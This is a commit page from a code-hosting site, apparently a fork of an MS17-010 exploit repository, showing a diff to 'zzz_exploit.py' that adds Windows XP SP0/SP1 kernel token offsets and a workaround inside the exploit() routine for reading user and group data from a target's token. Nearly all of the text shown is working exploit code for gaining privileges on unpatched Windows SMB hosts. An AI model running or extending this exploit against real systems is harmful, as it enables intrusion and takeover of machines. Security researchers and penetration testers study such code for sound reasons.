bozhihouc/MS17-010
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

fix offsets on XP SP0 and SP1

Browse Source
This commit is contained in:
zerosum0x0
2018-01-29 18:32:20 -07:00
parent 20301cc5a9
commit 078d156a0d
2 changed files with 65 additions and 55 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
mysmb.pyc Normal file
View File

Binary file not shown.

10
zzz_exploit.py
View File

@@ -154,6 +154,8 @@ WINXP_32_SESSION_INFO = {
'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1': 0x40,
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1': 0x5c
}
WIN2K_32_SESSION_INFO = {
@@ -867,6 +869,14 @@ def exploit(target, pipe_name):
userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
# hack to fix XP SP0 and SP1
if info['os'] == 'WINXP' and info['arch'] == 'x86':
if userAndGroupCount > 4:
print("Bad TOKEN offsets detected, performing workaround")
userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'])[0]
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'])[0]
print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))